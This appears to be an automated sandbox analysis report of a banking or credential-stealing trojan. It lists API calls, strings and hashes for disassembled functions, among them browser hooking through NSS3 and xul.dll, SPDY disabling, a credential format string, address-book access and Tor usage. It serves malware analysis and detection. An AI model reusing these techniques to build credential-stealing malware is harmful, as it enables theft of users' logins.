                                                                                                                                        • CloseHandle.KERNEL32(0046088E,Local\,00000001,?,0046088E), ref: 00450B01
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                                                                                                        • String ID: Local\
                                                                                                                                        • API String ID: 194907169-422136742
                                                                                                                                        • Opcode ID: 982f37abd8b12da5d12788bf6bd543f010d74fcd31a476692f3478e317400c95
                                                                                                                                        • Instruction ID: f1b9efe111b4cff41fc9516f10cbdeee7f6d574115ec338992ea5b92c92abfed
                                                                                                                                        • Opcode Fuzzy Hash: 982f37abd8b12da5d12788bf6bd543f010d74fcd31a476692f3478e317400c95
                                                                                                                                        • Instruction Fuzzy Hash: 4C215E74900208FFDB109FA5DC48A9EBFB9FB04345F10893EF905A2261EBB54E489B65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00444965, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00444997
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000320,00000000), ref: 004449B9
                                                                                                                                        • ConnectNamedPipe.KERNEL32(?,?), ref: 004449D9
                                                                                                                                        • GetLastError.KERNEL32 ref: 004449E3
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00444A07
                                                                                                                                        • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 00444A4A
                                                                                                                                        • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 00444A53
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 00444A5C
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00444A71
                                                                                                                                        • GetLastError.KERNEL32 ref: 00444A7E
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00444A8B
                                                                                                                                        • RtlExitUserThread.NTDLL(000000FF), ref: 00444AA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4053378866-0
                                                                                                                                        • Opcode ID: 9a118b4c17352f62aa50c3dab77ec43b822201e2e0b0ae225e89a67e02b6c5c5
                                                                                                                                        • Instruction ID: 4f4b6c742f8315992e47457168186644b304febd98cc3d84c09b07417b3203d2
                                                                                                                                        • Opcode Fuzzy Hash: 9a118b4c17352f62aa50c3dab77ec43b822201e2e0b0ae225e89a67e02b6c5c5
                                                                                                                                        • Instruction Fuzzy Hash: E2315070404705AFE7119F24DC44A6BBBA9FB84354F010B3EF565E21A0EBB49D498B6B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004468FB, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 232registrysynchronizationthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456F26
                                                                                                                                          • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 00456F79
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?), ref: 00456F81
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456FA4
                                                                                                                                          • Part of subcall function 00456E86: wcscpy.NTDLL ref: 00456FB6
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles,prefs.js,?,00000000,00000000,00000001), ref: 0044698E
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,?), ref: 004469BD
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004469E2
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,0044E818,0046E130), ref: 00446A25
                                                                                                                                        • RtlExitUserThread.NTDLL(?), ref: 00446A5B
                                                                                                                                          • Part of subcall function 00454999: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,74B05520,?,?,00458DD3,00000000,?,?), ref: 004549B7
                                                                                                                                          • Part of subcall function 00454999: GetFileSize.KERNEL32(00000000,00000000,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70), ref: 004549C7
                                                                                                                                          • Part of subcall function 00454999: CloseHandle.KERNEL32(000000FF,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70,?), ref: 00454A29
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 004417D0
                                                                                                                                          • Part of subcall function 0044178F: GetLastError.KERNEL32 ref: 004417DA
                                                                                                                                          • Part of subcall function 0044178F: WaitForSingleObject.KERNEL32(000000C8), ref: 004417FF
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00441820
                                                                                                                                          • Part of subcall function 0044178F: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00441848
                                                                                                                                          • Part of subcall function 0044178F: WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 0044185D
                                                                                                                                          • Part of subcall function 0044178F: SetEndOfFile.KERNEL32(?), ref: 0044186A
                                                                                                                                          • Part of subcall function 0044178F: CloseHandle.KERNEL32(?), ref: 00441882
                                                                                                                                        Strings
                                                                                                                                        • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004469B3
                                                                                                                                        • EnableSPDY3_0, xrefs: 004469D1
                                                                                                                                        • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 00446918
                                                                                                                                        • user_pref("network.http.spdy.enabled", false);, xrefs: 00446946, 0044695C
                                                                                                                                        • prefs.js, xrefs: 00446913
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
                                                                                                                                        • String ID: user_pref("network.http.spdy.enabled", false);$%APPDATA%\Mozilla\Firefox\Profiles$EnableSPDY3_0$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings$prefs.js
                                                                                                                                        • API String ID: 796380773-3405794569
                                                                                                                                        • Opcode ID: 6089cf6283a1013ab2bf05931d472c8f3df4436812a4befa4162860b5796a783
                                                                                                                                        • Instruction ID: fca17f10b9349030cf4ed687faa8c0c5abc6b9d8dfa7dc8086adfca7ef053bdf
                                                                                                                                        • Opcode Fuzzy Hash: 6089cf6283a1013ab2bf05931d472c8f3df4436812a4befa4162860b5796a783
                                                                                                                                        • Instruction Fuzzy Hash: 9D81AF71B007009FEB24DF69CC85A6BB7E5EB46704F11842FE546E7251E7B8E900CB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00462EC9, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 164memorythreadsleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL ref: 00462F02
                                                                                                                                        • memset.NTDLL ref: 00462F16
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                          • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                          • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00462FA5
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00462FB8
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 0046305F
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00463069
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0046308F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 004630BD
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000018), ref: 004630D0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                                                                                                                        • String ID: TorClient
                                                                                                                                        • API String ID: 1146182784-3399603969
                                                                                                                                        • Opcode ID: 9196eb8146ef60cb7ccc0986895368f23e1a218e7f36d1523c25246d00db2061
                                                                                                                                        • Instruction ID: 330961c80d40dde8423e03ccadebc662b69c8e7982a07bd53241efd973a14311
                                                                                                                                        • Opcode Fuzzy Hash: 9196eb8146ef60cb7ccc0986895368f23e1a218e7f36d1523c25246d00db2061
                                                                                                                                        • Instruction Fuzzy Hash: 3F5136B5604341AFD710DF2AD88095BBBE8BB48345F40092EF984D3261E775DE498BAB
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00461E71, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 121memoryregistrysynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044E8F7: RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
                                                                                                                                          • Part of subcall function 0044E8F7: lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00461EB6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00461ECE
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461F30
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00461F44
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461F94
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FBD
                                                                                                                                        • HeapFree.KERNEL32(00000000,004413AA,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FCD
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FD6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                                                                                                                        • String ID: jjF$pJF
                                                                                                                                        • API String ID: 3503961013-587095571
                                                                                                                                        • Opcode ID: 9fe43869c56cbb144b7306024e8fe5fb26d805584d7f4a6a389c5121abcc7a8e
                                                                                                                                        • Instruction ID: 4612a9b61e8e1d73df690d91af49d5b1f4987a1e825cde153c59de44a05c78d2
                                                                                                                                        • Opcode Fuzzy Hash: 9fe43869c56cbb144b7306024e8fe5fb26d805584d7f4a6a389c5121abcc7a8e
                                                                                                                                        • Instruction Fuzzy Hash: 824113B5D00109EFDF019F91DC848EEBBB9FB08344F14447AE505A2220E7794E95EF6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045B80F, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 112stringtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0045E03B), ref: 0045B825
                                                                                                                                        • wsprintfA.USER32 ref: 0045B84D
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0045B85C
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        • wsprintfA.USER32 ref: 0045B89C
                                                                                                                                        • wsprintfA.USER32 ref: 0045B8D1
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 0045B8DE
                                                                                                                                        • memcpy.NTDLL(00000008,004683E4,00000002,00000000,?,?), ref: 0045B8F3
                                                                                                                                        • wsprintfA.USER32 ref: 0045B916
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                                                                                                                        • String ID: ;E$;E
                                                                                                                                        • API String ID: 2937943280-926416562
                                                                                                                                        • Opcode ID: b7dbf6f056c2bf12501e25c8e5cbe969d616d115a2f2cdc4935f82b7e2563037
                                                                                                                                        • Instruction ID: 86e2aa9079cda3e508a334bde232f697cdf6c15c79b462522f154d29b8b78520
                                                                                                                                        • Opcode Fuzzy Hash: b7dbf6f056c2bf12501e25c8e5cbe969d616d115a2f2cdc4935f82b7e2563037
                                                                                                                                        • Instruction Fuzzy Hash: 5B415375900109AFDB00DF99DC84EAAB3FCEF44309B14446AF949D7221EB74EE19CB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00464B05, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrChrA.SHLWAPI(004656AA,0000002C,750DD3B0,00000000,004656AA,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464B2A
                                                                                                                                        • StrChrA.SHLWAPI(00000001,0000002C,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464B3D
                                                                                                                                        • StrTrimA.SHLWAPI(004656AA,20000920,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464B60
                                                                                                                                        • StrTrimA.SHLWAPI(00000001,20000920,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464B6F
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464BA4
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00464BB7
                                                                                                                                        • lstrcpy.KERNEL32(00000004,00000000), ref: 00464BD5
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,Scr,00000000,-00000005,00000001,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000), ref: 00464BFB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                                                                                                                        • String ID: Scr$pgF
                                                                                                                                        • API String ID: 1974185407-1283566579
                                                                                                                                        • Opcode ID: 29f8d388390741cfd4e5b808a406e6b1fbca800b4618d9288bcc7e60e3ff9379
                                                                                                                                        • Instruction ID: 97452728d926b8a7ad422259c58d23f3d61befa2f33902b2dfb932960cf0deb4
                                                                                                                                        • Opcode Fuzzy Hash: 29f8d388390741cfd4e5b808a406e6b1fbca800b4618d9288bcc7e60e3ff9379
                                                                                                                                        • Instruction Fuzzy Hash: D931BD75901218FEDB219F64CC44EAB7BB8EF48B40F114066F80897360F7B89D45CB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044C2BE, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044E261: RtlAllocateHeap.NTDLL(00000000,?), ref: 0044E293
                                                                                                                                          • Part of subcall function 0044E261: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,0044C2DA,?,00000022), ref: 0044E2B8
                                                                                                                                          • Part of subcall function 00443488: HeapFree.KERNEL32(00000000,00000000,?), ref: 004434C2
                                                                                                                                          • Part of subcall function 00443488: HeapFree.KERNEL32(00000000,?,?,00000001), ref: 0044350E
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C330
                                                                                                                                        • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C338
                                                                                                                                        • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C342
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0044C357
                                                                                                                                        • wsprintfA.USER32 ref: 0044C38C
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000011E,00000000,00000000,00000000,?,00000022), ref: 0044C3AE
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000022,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C3C3
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,0000001D,?,0000001C,?,?,00000022), ref: 0044C3D0
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,0000001C,?,?,00000022), ref: 0044C3DE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                                                                                                                        • String ID: URL: %suser=%spass=%s
                                                                                                                                        • API String ID: 168057987-1589266237
                                                                                                                                        • Opcode ID: 5d5cdb8051d829349e6e8a71bea8b1535d2ef6ecdfb0ed85dd36ed9a74858d44
                                                                                                                                        • Instruction ID: 8c472d80faf159719e7c217d193dd87bd49916b722c0a9ad682eec1f1de5e101
                                                                                                                                        • Opcode Fuzzy Hash: 5d5cdb8051d829349e6e8a71bea8b1535d2ef6ecdfb0ed85dd36ed9a74858d44
                                                                                                                                        • Instruction Fuzzy Hash: 0931C431A05314BBD711AF659C41E5FBB98FF44754F00493EF944E22A1E7B58C14CB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044FF73, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 97memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00449E33,00000000), ref: 0044FF8D
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0044FFA2
                                                                                                                                        • memset.NTDLL ref: 0044FFAF
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00449E32,?,?,00000000,?,00000000,0044AF60,?,00000000), ref: 0044FFCC
                                                                                                                                        • memcpy.NTDLL(?,?,00449E32,?,00449E32,?,?,00000000,?,00000000,0044AF60,?,00000000), ref: 0044FFED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Allocate$Freememcpymemset
                                                                                                                                        • String ID: Content-Length:$Referer: $Transfer-Encoding:$chun$pgF
                                                                                                                                        • API String ID: 2362494589-685425981
                                                                                                                                        • Opcode ID: 0276f8fac18944732805618d6924968f5c4122ab0400bb8b0183f722fbf68924
                                                                                                                                        • Instruction ID: b7ab0f0a25eb42edab88195a3b415eafe304f738fa456ab34a52ade14745348e
                                                                                                                                        • Opcode Fuzzy Hash: 0276f8fac18944732805618d6924968f5c4122ab0400bb8b0183f722fbf68924
                                                                                                                                        • Instruction Fuzzy Hash: B831AE35600701AFE7309F66DC40B27BBE8EF14B15F00442BE94A972A1E778E949CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044DB26, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 85registrylibraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0044DB41
                                                                                                                                        • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0044DBF2
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0044DB8F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WABOpen), ref: 0044DBA1
                                                                                                                                        • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0044DBC0
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 0044DBD2
                                                                                                                                        • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0044DBDA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                                                                                                                        • String ID: Software\Microsoft\WAB\DLLPath$WABOpen$^nF
                                                                                                                                        • API String ID: 1628847533-1244126046
                                                                                                                                        • Opcode ID: 630eeb2855bbedc8be6f7af6c1aaa3f287d55518f572331aaccbd4be5854d47a
                                                                                                                                        • Instruction ID: e451f9cdd334a8846d494f837c36c138c9b143c1102adc1dd06a7003204196a3
                                                                                                                                        • Opcode Fuzzy Hash: 630eeb2855bbedc8be6f7af6c1aaa3f287d55518f572331aaccbd4be5854d47a
                                                                                                                                        • Instruction Fuzzy Hash: 4E21F531D00294FFEB216BA59C48D9FBF7CFB85700B22056BF802A7210EAB46D00DB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045D8E5, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0045B50C,?,?,00000000), ref: 0045D8F1
                                                                                                                                        • _aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 0045D907
                                                                                                                                        • _snwprintf.NTDLL ref: 0045D92C
                                                                                                                                        • CreateFileMappingW.KERNEL32(000000FF,0046E0F8,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 0045D948
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C,?), ref: 0045D95A
                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,00000000,54D38000,00000192), ref: 0045D971
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C), ref: 0045D992
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C,?), ref: 0045D99A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                        • String ID: Local\
                                                                                                                                        • API String ID: 1814172918-422136742
                                                                                                                                        • Opcode ID: 004159ff2f4068b618555d6180361aa9968ee980a69032f92d37550dfb373975
                                                                                                                                        • Instruction ID: 6d1c51f7b28db09d6ebebba8bc289862c7449a0a9b0bca2f9b484d2ff3780ba8
                                                                                                                                        • Opcode Fuzzy Hash: 004159ff2f4068b618555d6180361aa9968ee980a69032f92d37550dfb373975
                                                                                                                                        • Instruction Fuzzy Hash: E72127B2A40204FBD720EB65CC05F8E77B9AF44701F214136FA05E72D1EAB499098B6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045DD8F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(NSPR4.DLL,?,00000000,00000000,00452C2E,00000000,74B5F5B0,0044BAA6,61636F4C,00000001,?,?), ref: 0045DDA8
                                                                                                                                        • LoadLibraryA.KERNEL32(NSS3.DLL), ref: 0045DDB6
                                                                                                                                        • LoadLibraryA.KERNEL32(xul.dll), ref: 0045DDCB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 0045DDD9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 0045DDE6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$AddressProc
                                                                                                                                        • String ID: NSPR4.DLL$NSS3.DLL$PR_GetError$PR_SetError$xul.dll
                                                                                                                                        • API String ID: 1469910268-282796573
                                                                                                                                        • Opcode ID: 13d138fe1337c5b0da291081579ba441c46a393ffab70c75e6ed13c70756fa19
                                                                                                                                        • Instruction ID: 0c032d4c084d317348f1bfe213b0d7fa86985051dcb24e61ce5fea65ff10c6c2
                                                                                                                                        • Opcode Fuzzy Hash: 13d138fe1337c5b0da291081579ba441c46a393ffab70c75e6ed13c70756fa19
                                                                                                                                        • Instruction Fuzzy Hash: C2215871F412109BC325EF6EEC86A4577E4AB99711B10003BE418D73A1FBF888058B5E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045AFF7, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,004579BB,00000000,?,?,?), ref: 0045B00F
                                                                                                                                        • StrChrA.SHLWAPI(00000001,00000020,?,?,?,004579BB,00000000,?,?,?), ref: 0045B020
                                                                                                                                          • Part of subcall function 0044407A: lstrlen.KERNEL32(?), ref: 0044408C
                                                                                                                                          • Part of subcall function 0044407A: StrChrA.SHLWAPI(?,0000000D), ref: 004440C4
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0045B059
                                                                                                                                        • memcpy.NTDLL(00000000,http://,00000007,?,?,?,004579BB,00000000), ref: 0045B07F
                                                                                                                                        • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,004579BB,00000000), ref: 0045B08E
                                                                                                                                        • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,004579BB,00000000), ref: 0045B0A0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                        • String ID: Host:$http://$https://
                                                                                                                                        • API String ID: 1819133394-2811860193
